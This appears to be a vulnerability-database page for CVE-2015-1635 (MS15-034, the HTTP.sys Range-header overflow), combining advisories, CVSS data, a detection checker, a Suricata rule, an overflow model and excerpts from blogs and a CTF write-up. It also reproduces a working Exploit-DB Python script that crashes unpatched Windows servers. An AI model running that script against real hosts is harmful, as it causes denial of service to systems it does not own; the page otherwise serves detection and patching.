CVE-2015-1635
Published 2015-04-14
Priority: P196 · critical 9.8 (CVSS 3.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2022-08-10
Exploited in the wild
EPSS: 100.00% (100.0th percentile)
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
Affected
2 ranges (the table below carries only the two server CPE entries and no version bounds; the NVD description above also names Windows 7 SP1, Windows 8 and Windows 8.1)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
Detection & IOCs (extracted from sources)
- Send an HTTP request with `Range: bytes=0-18446744073709551615` to the target IIS server. A response of HTTP 416 ("Requested Range Not Satisfiable") indicates the host is vulnerable to CVE-2015-1635; a patched host rejects the header before reaching UlAdjustRangeToContentSize and answers 400 rather than 416. This zero-offset form is the non-crashing check; the same header with a non-zero start offset (the Exploit-DB PoC below uses 18) is the crash variant, so do not send it to a host you are not prepared to take down.
- Exploitation requires at least two requests for the same resource: the first primes the kernel cache path (CacheMiss), and the following request carrying the malformed Range triggers BuildCacheEntry and SendCacheEntry with the overflowed length, causing a BSOD/crash.
- The Metasploit auxiliary module `auxiliary/dos/http/ms15_034_ulonglongadd` can be used to check for and trigger the DoS condition against CVE-2015-1635 targets.
- The C checker PoC (Exploit-DB 36773) is marked UNTESTED by its author and should be treated as a detection/audit checker only, not a reliable weaponised exploit. The public code on this page is limited to DoS, memory disclosure and checkers; no RCE exploit is listed.
- The vulnerability is actively exploited in the wild and DoS exploit code is widespread; patching, or disabling IIS kernel caching as the documented MS15-034 workaround, should be prioritised for Internet-facing Windows IIS servers.
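The 416-versus-400 check above, written out as an added example (this is not code from the page's sources, Microsoft or Metasploit). It goes one step beyond the IOC entry by also requiring a Microsoft-IIS or Microsoft-HTTPAPI `Server` header before calling a 416 "vulnerable", since a 416 from other server software says nothing about HTTP.sys. The host names, paths and the three sample responses are constructed; `check_host` is the only part that touches the network and is not exercised by the samples.

```python
import socket

# The upper bound used by the public MS15-034 probe: 2**64 - 1, the largest
# value that still fits a 64-bit unsigned range offset.
OVERFLOW_END = 18446744073709551615


def build_probe(host, path="/", start=0):
    """Build the raw MS15-034 probe request.

    start=0 is the widely used non-crashing check; start=18 (as in the
    Exploit-DB PoC on this page) is the variant that crashes an unpatched host.
    """
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Range: bytes={start}-{OVERFLOW_END}\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    ).encode("ascii")


def parse_response(raw):
    """Return (status_code, headers) from a raw HTTP response.

    status_code is None when the bytes do not start with an HTTP status line;
    header names are lower-cased so lookups are case-insensitive.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/") or not parts[1].isdigit():
        return None, {}
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return int(parts[1]), headers


def classify(status, headers):
    """Map a probe response to a verdict.

    416 from an IIS / HTTP.sys server is the vulnerable signature; a patched
    HTTP.sys rejects the header outright with 400. A 416 from any other server
    software is reported separately because it does not indicate this CVE.
    """
    server = headers.get("server", "")
    is_http_sys = "Microsoft-IIS" in server or "Microsoft-HTTPAPI" in server
    if status is None:
        return "no-http-response"
    if status == 416:
        return "vulnerable" if is_http_sys else "416-from-non-iis"
    if status == 400 and is_http_sys:
        return "patched"
    return "inconclusive"


def check_host(host, port=80, path="/", timeout=5.0):
    """Send the non-crashing probe to a live host and return the verdict."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe(host, path))
        raw = sock.recv(4096)
    return classify(*parse_response(raw))


# Constructed responses (not captured from a real server) showing each verdict.
SAMPLE_VULNERABLE = b"HTTP/1.1 416 Requested Range Not Satisfiable\r\nServer: Microsoft-IIS/8.5\r\n\r\n"
SAMPLE_PATCHED = b"HTTP/1.1 400 Bad Request\r\nServer: Microsoft-HTTPAPI/2.0\r\n\r\n"
SAMPLE_OTHER = b"HTTP/1.1 206 Partial Content\r\nServer: nginx\r\n\r\n"

if __name__ == "__main__":
    for raw in (SAMPLE_VULNERABLE, SAMPLE_PATCHED, SAMPLE_OTHER):
        print(raw.split(b"\r\n", 1)[0].decode(), "->", classify(*parse_response(raw)))
```

Keep `start=0` for scanning: the probe is still a request that the Suricata rule further down will flag, so expect alerts from your own IDS when you run it.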
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
GHSA
GHSA-p8wc-6g47-vh8j: HTTP
ghsa_unreviewed·2022-05-14·HIGH·CWE-94
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
VulnCheck
Microsoft HTTP.sys Remote Code Execution Vulnerability
vulncheck·2015·CVSS 9.8 [CRITICAL]·CWE-94
Microsoft HTTP protocol stack (HTTP.sys) contains a vulnerability that allows for remote code execution.
Affected: Microsoft HTTP.sys
Required Action: Apply updates per vendor instructions.
Exploitation References:
- https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
- https://web-assets.esetstatic.com/wls/2023/07/eset_threat_report_h12023.pdf
- https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h22023.pdf
- https://veriti.ai/blog/vulnerable-villain-when-hackers-get-hacked/
- https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h12024.pdf
- https://web-assets.esetstatic.com/wl
CISA
Microsoft HTTP.sys Remote Code Execution Vulnerability
cisa·2022-02-10·CVSS 9.8 [CRITICAL]·CWE-94
Vulnerability: Microsoft HTTP.sys Remote Code Execution Vulnerability
Affected: Microsoft HTTP.sys
Microsoft HTTP protocol stack (HTTP.sys) contains a vulnerability that allows for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2015-1635
Remediation Due Date: 2022-08-10
Suricata
ET WEB_SERVER Possible IIS Integer Overflow DoS (CVE-2015-1635)
suricata·2015-04-15·CVSS 9.8 [CRITICAL]
Rule:
```
alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible IIS Integer Overflow DoS (CVE-2015-1635)"; flow:established,to_server; http.request_header; header_lowercase; content:"range|3a 20|"; startswith; content:"18446744073709551615"; fast_pattern; distance:0; reference:cve,2015-1635; classtype:web-application-attack; sid:2020912; rev:6; metadata:created_at 2015_04_15, cve CVE_2015_1635, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_04_21;)
```
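What the rule actually keys on, as an added example rather than Emerging Threats code: it approximates the match logic of sid 2020912 in Python, treating each request header as its own buffer, lower-casing it (`header_lowercase`), requiring the `range: ` prefix (`startswith`) and then the 2**64-1 literal after it (`distance:0`). The five requests are constructed samples, not captured traffic. The point worth seeing is what does and does not trip it: both the zero-offset probe and the 18-offset crash variant match, while the same literal in a URL, or an off-by-one value, does not.

```python
OVERFLOW_VALUE = b"18446744073709551615"
RANGE_PREFIX = b"range: "  # content:"range|3a 20|" after header_lowercase


def request_header_lines(raw_request):
    """Return the header lines of a raw HTTP request (request line and body excluded)."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    return head.split(b"\r\n")[1:]


def matches_et_2020912(raw_request):
    """Emulate the match logic of ET sid 2020912 on one client request.

    Per header: lower-case it (header_lowercase), require it to begin with
    'range: ' (startswith), then look for the 2**64-1 literal anywhere after
    that prefix (distance:0 relative to the previous match). The rule does not
    constrain the start offset, so both the 0- probe and the 18- crash variant
    match; the literal appearing in a URL or body does not.
    """
    for line in request_header_lines(raw_request):
        lowered = line.lower()
        if lowered.startswith(RANGE_PREFIX) and OVERFLOW_VALUE in lowered[len(RANGE_PREFIX):]:
            return True
    return False


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "benign_resume": b"GET /big.iso HTTP/1.1\r\nHost: a\r\nRange: bytes=1048576-\r\n\r\n",
    "probe_0":       b"GET / HTTP/1.1\r\nHost: a\r\nRange: bytes=0-18446744073709551615\r\n\r\n",
    "crash_18_caps": b"GET /iisstart.htm HTTP/1.1\r\nHost: a\r\nRANGE: bytes=18-18446744073709551615\r\n\r\n",
    "off_by_one":    b"GET / HTTP/1.1\r\nHost: a\r\nRange: bytes=0-18446744073709551614\r\n\r\n",
    "value_in_url":  b"GET /?r=18446744073709551615 HTTP/1.1\r\nHost: a\r\n\r\n",
}


def scan_samples():
    """Run the emulated rule over every sample and return {name: alerted}."""
    return {name: matches_et_2020912(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, hit in scan_samples().items():
        print(f"{name:14s} {'ALERT' if hit else 'ok'}")
```

The `off_by_one` sample is the reason this signature carries `confidence Medium`: it is a literal match on one value, not a check that the range end overflows, so a trivially altered offset slips past it while still being a large, suspicious range.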
Exploit-DB
Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)
exploitdb·2015-04-16
---
```python
# Tested on Win Srv 2012R2.
# Two requests for a static file: a plain GET first, then the same file with
# the overflowing Range header (start 18, end 2**64-1). Against an unpatched
# HTTP.sys the second request crashes the host (BSOD).
import socket
import sys

if len(sys.argv) <= 1:
    sys.exit('Give me an IP')
Host = sys.argv[1]


def SendPayload(Payload, Host):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((Host, 80))
    s.send(Payload.encode())  # str -> bytes so the script also runs under Python 3
    s.recv(1024)
    s.close()


# Make sure iisstart.htm exists.
# First request: ordinary GET so the file goes through the kernel cache path.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
# Second request: the malformed Range that triggers the integer overflow.
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"
SendPayload(Init, Host)
SendPayload(Payload, Host)
```
Exploit-DB
Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034)
exploitdb·2015-04-15
---
```c
/*
UNTESTED - MS15-034 Checker
THE BUG:
8a8b2112 56 push esi
8a8b2113 6a00 push 0
8a8b2115 2bc7 sub eax,edi
8a8b2117 6a01 push 1
8a8b2119 1bca sbb ecx,edx
8a8b211b 51 push ecx
8a8b211c 50 push eax
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
ORIGINAL POC: http://pastebin.com/raw.php?i=ypURDPc4
BY: [email protected]
Twitter: @rhcp011235
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int connect_to_server(char *ip)
{
int sockfd = 0, n = 0;
struct sockaddr_in serv_addr;
struct hostent *server;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) \n",argv[0]);
return 1;
}
printf("[*] Audit Started\n");
sockfd = connect_to_server(argv[1]);
write(sockfd, request, strlen(requ
```
Metasploit
MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
metasploit·CVSS 9.8 [CRITICAL]
This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code execution. This module will try to cause a denial-of-service.
Metasploit
MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
metasploit
This module dumps memory contents using a crafted Range header and affects only Windows 8.1, Server 2012, and Server 2012R2. Note that if the target is running in VMware Workstation, this module has a high likelihood of resulting in BSOD; however, VMware ESX and non-virtualized hosts seem stable. Using a larger target file should result in more memory being dumped, and SSL seems to produce more data as well.
Nuclei
Microsoft Windows 'HTTP.sys' - Remote Code Execution
nuclei·CVSS 9.8 [CRITICAL]
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
Template:
```yaml
id: CVE-2015-1635
info:
  name: Microsoft Windows 'HTTP.sys' - Remote Code Execution
  author: Phillipo
  severity: critical
  description: |
    HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
  impact: |
    Attackers can execute arbitrary code remotely on Windows servers running vulnerab
```
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5 (keyed to CVE-2020-28188 [HIGH])
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Byline: Lei Xu, Yue Guan, Vaibhav Singhal. Published: April 12, 2021. Tags: Malware, Trend Reports, Vulnerabilities, Botnet, DDoS, Exploit kit, IoT, Network security trends.
Qualys
MS15-034 Analysis And Remote Detection | Qualys
blogs_qualys·2015-04-20·CVSS 9.8 [CRITICAL]
It was a routine patch Tuesday and I was developing signatures for Qualys VM to identify vulnerabilities. But when I glanced at CVE-2015-1635 it was clear immediately that there was nothing routine about it. It’s a critical vulnerability which can allow remote attackers to take complete control of IIS web servers without have any prior credentials to the server. Now that is BIG! After releasing the VM signature I started working on this blog post which explains a bit further on how an attack using CVE-2015-1635 works. The blog post also explains the working of Qualys VM QID 91041.
### Background
HTTP Range allows HTTP clients to fetch the specified offset within the file on the HTTP server. It’s mainly used for ‘Resume broken downloads’. Let’s say you are downloading a file called ‘welco
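The Range background above and the disassembly in the Exploit-DB checker (a 64-bit subtraction followed by a call to `HTTP!RtlULongLongAdd`) point at the same bug class: a byte-range length computed in unsigned 64-bit arithmetic that wraps instead of failing. The following is an added illustrative model written for this page; it is not code from HTTP.sys, Qualys or Exploit-DB and does not claim to reproduce HTTP.sys's real control flow. It assumes a closed `bytes=first-last` range, a constructed content length of 1000 bytes, and models `RtlULongLongAdd` only by its documented contract (report overflow rather than wrap). With the two start offsets used on this page, 0 and 18, it shows why the offset matters: with 0 the length itself wraps to zero, while with 18 the length stays enormous and it is the `first + length` bounds check that wraps to 0 and passes.

```python
U64_MAX = 2**64 - 1


def parse_byte_range(value):
    """Parse a single 'bytes=first-last' Range value into (first, last).

    Offsets are constrained to what fits a 64-bit unsigned integer, so
    18446744073709551615 (2**64 - 1) parses, exactly as in the PoC header;
    last=None means an open-ended 'first-' range.
    """
    if not value.startswith("bytes="):
        raise ValueError("unsupported range unit")
    spec = value[len("bytes="):]
    if "," in spec:
        raise ValueError("multi-range values are out of scope for this model")
    first, sep, last = spec.partition("-")
    if not sep or not first.isdigit() or (last and not last.isdigit()):
        raise ValueError("malformed byte-range-spec")
    first = int(first)
    last = int(last) if last else None
    if first > U64_MAX or (last is not None and (last > U64_MAX or last < first)):
        raise ValueError("range offsets out of 64-bit bounds or reversed")
    return first, last


def wrapping_add(a, b):
    """Plain 64-bit unsigned addition: wraps silently like native ULONGLONG arithmetic."""
    return (a + b) & U64_MAX


def checked_add(a, b):
    """RtlULongLongAdd-style addition: (ok, result), ok=False when the sum needs more than 64 bits."""
    total = a + b
    return (total <= U64_MAX, total & U64_MAX)


def range_accepted_unchecked(first, last, content_length):
    """Model of a bounds check built on wrapping arithmetic (closed ranges only).

    length = last - first + 1; the range is accepted when first + length does
    not exceed the content length. Both additions can wrap, so an enormous
    length can pass a check that reads as correct.
    """
    length = wrapping_add(last - first, 1)
    end = wrapping_add(first, length)
    return end <= content_length, length


def range_accepted_checked(first, last, content_length):
    """Same logic with overflow-checked additions: a wrap is reported, not masked."""
    ok, length = checked_add(last - first, 1)
    if not ok:
        return False, None
    ok, end = checked_add(first, length)
    if not ok:
        return False, None
    return end <= content_length, length


# Constructed content length for the model; the real file size does not affect the wrap.
CONTENT_LENGTH = 1000

if __name__ == "__main__":
    for hdr in ("bytes=0-499", "bytes=0-18446744073709551615", "bytes=18-18446744073709551615"):
        first, last = parse_byte_range(hdr)
        print(hdr,
              "unchecked:", range_accepted_unchecked(first, last, CONTENT_LENGTH),
              "checked:", range_accepted_checked(first, last, CONTENT_LENGTH))
```

The checked variant rejects both malformed ranges before any length reaches a copy or send path, which is the property a checked-add API buys you; the unchecked variant accepts the 18-offset range with a length of 2**64 - 18 bytes, which is the shape of the value that the page's DoS PoC pushes into the cache path.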
Talos
Microsoft Patch Tuesday for April 2015: 11 Bulletins Released
blogs_talos·2015-04-14·CVSS 9.8 [CRITICAL]
Today, Microsoft has released their monthly set of security bulletins designed to address security vulnerabilities within their products. This month’s release sees a total of 11 bulletins being released which address 26 CVEs. The first 4 bulletins are rated Critical and address vulnerabilities within Internet Explorer, Office, IIS, and Graphics Component. The remaining 7 bulletins are rated Important and cover vulnerabilities within SharePoint, Task Scheduler, Windows, XML Core Services, Active Directory, .NET, and Hyper-V.
### Bulletins Rated Critical
MS15-032, MS15-033, MS15-034, and MS15-035 are rated Critical.
MS15-032 is this month’s Internet Explorer security bulletin with vulnerabilities in versions 6 through 11 being addressed. This month, 10 CVEs were addressed with the majority
Qualys
Patch Tuesday April 2015 | Qualys
blogs_qualys·2015-04-14·CVSS 7.8 [HIGH]
April’s Patch Tuesday continues the 2015 trend of high volume patches. This month we have a full set of 11 patches from Microsoft addressing 26 vulnerabilities.The vulnerabilities affect Windows and Office on both servers and workstations. In addition, Oracle is publishing their quarterly Critical Patch Update fixing 98 vulnerabilities in over 25 software categories, including Java, Oracle RDBMS and MySQL.
Add to that the fixes in Adobe, Mozilla and Google Chrome software that were initiated by the results of the PWN2OWN competition in Vancouver, and every defensive IT security professional will have their work doubled this month.
Let’s start with Microsoft: 11 bulletins from MS15-032 to MS15-042 with four of them critical. But priorities are clear this month:
Number one is MS15-033, th
arXiv
Enterprise Security Incident Analysis and Countermeasures Based on the T-Mobile Data Breach
arxiv_fulltext·2025-07-17
## Abstract
This paper presents a comprehensive analysis of T-Mobile’s critical data breaches in 2021 and 2023, alongside a full-spectrum security audit targeting its systems, infrastructure, and publicly exposed endpoints. By combining case-based vulnerability assessments with active ethical hacking techniques—including Shodan reconnaissance, API misuse simulations, VNC brute-forcing, firmware reverse engineering, and web application scans—we uncover structural weaknesses persisting beyond the initial breach events. Building on these findings, we propose a multi-layered defensive strategy encompassing Zero Trust Architecture, granular role-based access control, network segmentation, firmware encryption using AES with integrity checks, and API rate limiting and token lifecycle control. Fi
CTF
EZ / devel
ctf_writeups·CVSS 9.8 [CRITICAL]
# recon
- windows: ping ttl 127
- port 21 : ftp
- mounted on the web directory
- `put` is allowed -> the uploaded file can be accessed from the webserver.
- port 80/tcp open http Microsoft IIS httpd 7.5
- MS15-034
- CVE:CVE-2015-1635
we can use the directory in ftp to find the web directory /aspnet_client/system_web/2_0_50727/
- nikto
```console
kali@kali:~/script$ nikto -h devel.htb
- Nikto v2.1.6
+ Target IP: 10.10.10.5
+ Target Hostname: devel.htb
+ Target Port: 80
+ Start Time: 2020-09-22 09:00:24 (GMT-4)
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
```
note that the site uses **ASP.NET**
so based on what we know, we can create a reverse shell to get a foothold
- ASP.NET : executes .asp or .aspx, try it out and you will know.
- I tried .asp and it didn't work so let's go for .aspx
- meterpreter: `
HackerOne
[Urgent] Critical Vulnerability [RCE] on ███ vulnerable to Remote Code Execution by exploiting MS15-034, CVE-2015-1635
hackerone·2022-05-26·CVSS 9.8 [CRITICAL]
@ashutosh7 found a ███████ server in Shodan, vulnerable to MS15-034, confirmed using Metasploit. Thanks for participating in the DoD VDP.
Found a ████ server in Shodan, vulnerable to MS15-034. Confirmed using Metasploit. Will add the link for the writeup.
References:
- http://packetstormsecurity.com/files/131463/Microsoft-Windows-HTTP.sys-Proof-Of-Concept.html
- http://www.osvdb.org/120629
- http://www.securityfocus.com/bid/74013
- http://www.securitytracker.com/id/1032109
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-034
- https://www.exploit-db.com/exploits/36773/
- https://www.exploit-db.com/exploits/36776/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2015-1635
Timeline:
- 2015-04-14: Published
- 2022-02-10: Added to CISA KEV
- Exploited in the wild